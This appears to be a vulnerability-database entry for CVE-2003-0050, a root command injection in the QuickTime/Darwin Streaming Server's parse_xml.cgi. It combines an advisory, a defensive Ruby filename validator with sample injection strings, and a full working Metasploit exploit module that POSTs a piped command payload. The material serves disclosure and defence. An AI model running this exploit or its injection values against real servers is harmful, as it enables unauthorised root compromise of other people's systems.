Apple QuickTime/Darwin Streaming Server parse_xml.cgi Remote Command Execution Vulnerability

Vulnerability ID 1119593 Vulnerability type Input validation
Published 2010-07-03 Updated 2010-07-03
CVE number CVE-2003-0050 CNNVD-ID CNNVD-200303-039
Vulnerability platform CGI CVSS score 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/16891
https://www.securityfocus.com/bid/6954
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200303-039
|Vulnerability details
The Apple Darwin and QuickTime Streaming Administration Server is a web-based service that lets administrators manage Darwin and QuickTime Streaming Servers. By default it listens on 1220/TCP and runs with root privileges. The Darwin/QuickTime Streaming Server does not adequately filter user-supplied input, and a remote attacker can exploit this to execute arbitrary commands on the system with the privileges of the streaming server process.

The Darwin Streaming Administration Server relies on the parse_xml.cgi application to authenticate and interact with users. This CGI is written in Perl and passes insufficiently sanitized input directly to the open() function; when a pipe character '|' is inserted into the input, open() executes the embedded command. The parameter can be supplied to the CGI through a GET request. Newer versions of the Darwin Streaming Administration Server add partial filtering, but inserting a NUL character between the last character of the command and the pipe bypasses the check, again allowing arbitrary commands to be executed with the privileges of the streaming server process.
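As an added illustration from the defender's side (not part of the original advisory or the Metasploit module below), the following Ruby shows the fix and the check a maintainer of such a CGI would want. Ruby's Kernel#open has the same pipe semantics as Perl's two-argument open(), so the validator rejects the metacharacters and the NUL byte the advisory describes, a request-body audit helper flags filename values that carry them, and safe_open shows the hardened pattern (allowlist first, then File.open with an explicit mode). The allowlist, the metacharacter set, the function names and the sample POST bodies are constructed assumptions, not the server's own code or captured traffic.

```ruby
require 'uri'

# Added example, not from the advisory or the Metasploit module.
# Allowlist for a single file-name component: letters, digits, '.', '_', '-',
# not starting with '.', so path traversal never reaches the filesystem.
SAFE_NAME = /\A[A-Za-z0-9][A-Za-z0-9._-]{0,127}\z/

# Characters that turn a two-argument Perl open() (or Ruby's Kernel#open)
# into a command: a pipe at either end opens a process, and a NUL byte can
# hide the pipe from a check that only looks at the last visible character.
META_CHARS = /[|;&`$<>\n\x00]/

# Classify one URL-encoded filename value after decoding it.
#   :safe      -> matches the allowlist and may be used
#   :injection -> contains an open()/shell metacharacter or a NUL byte
#   :reject    -> otherwise malformed (empty, traversal, too long)
def classify_filename(raw)
  name = URI.decode_www_form_component(raw.to_s)
  return [:safe, name] if name.match?(SAFE_NAME)
  return [:injection, name] if name.match?(META_CHARS)
  [:reject, name]
end

# Audit an application/x-www-form-urlencoded body and report every
# 'filename' value together with its classification.
def audit_post_body(body)
  body.split('&').each_with_object([]) do |pair, out|
    key, value = pair.split('=', 2)
    out << classify_filename(value) if key == 'filename'
  end
end

# Hardened replacement for "open(param)": validate first, then open with
# File.open (never Kernel#open) and an explicit mode, so the value can only
# ever name a file under base_dir and never a command.
def safe_open(base_dir, raw)
  verdict, name = classify_filename(raw)
  raise ArgumentError, "rejected filename (#{verdict})" unless verdict == :safe
  File.open(File.join(base_dir, name), 'r')
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample bodies, not captured traffic.
  samples = [
    'filename=report.xml',
    'filename=%3Bid%7C',          # ';id|'  -> pipe open
    'filename=a%00%7C',           # NUL placed before the pipe
    'filename=..%2Fetc%2Fpasswd'  # traversal, no metacharacter
  ]
  samples.each { |body| p audit_post_body(body) }
end
```

The classification deliberately checks the allowlist before the metacharacter list: anything that is not positively acceptable is refused, and the :injection label only exists so that an audit of request logs can separate probing from ordinary malformed input.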
|Vulnerability EXP
##
# $Id: qtss_parse_xml_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
			'Description'    => %q{
					The QuickTime Streaming Server contains a CGI script that is vulnerable
				to metacharacter injection, allow arbitrary commands to be executed as root.
				},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'OSVDB', '10562'],
					[ 'BID', '6954' ],
					[ 'CVE', '2003-0050' ]
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 24 2003'
		))

		register_options(
			[
				Opt::RPORT(1220)
			], self.class)
	end

	def exploit

		print_status("Sending post request with embedded command...")

		data = "filename=" + Rex::Text.uri_encode(";#{payload.encoded}|")

		response = send_request_raw({
			'uri'	  => "/parse_xml.cgi",
			'method'  => 'POST',
			'data'    => data,
			'headers' =>
			{
				'Content-Type'	 => 'application/x-www-form-urlencoded',
				'Content-Length' => data.length,
			}
		}, 3)

		# The POST body is the injection itself; a non-200 status means the CGI
		# did not accept it. No response at all is common once the command runs,
		# so only an explicit status mismatch is reported.
		if response and response.code != 200
			print_error("Server returned non-200 status code (#{response.code})")
		end

		handler
	end
end
|Affected products
Apple Darwin Streaming Server 4.1.2
|References

Source: BUGTRAQ
Name: 20030224 QuickTime/Darwin Streaming Administration Server Multiple vulnerabilities
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=104618904330226&w=2
Source: XF
Name: quicktime-darwin-command-execution(11401)
Link: http://www.iss.net/security_center/static/11401.php
Source: lists.apple.com
Link: http://lists.apple.com/archives/security-announce/2003/Feb/25/applesa20030225macosx102.txt
Source: BID
Name: 6954
Link: http://www.securityfocus.com/bid/6954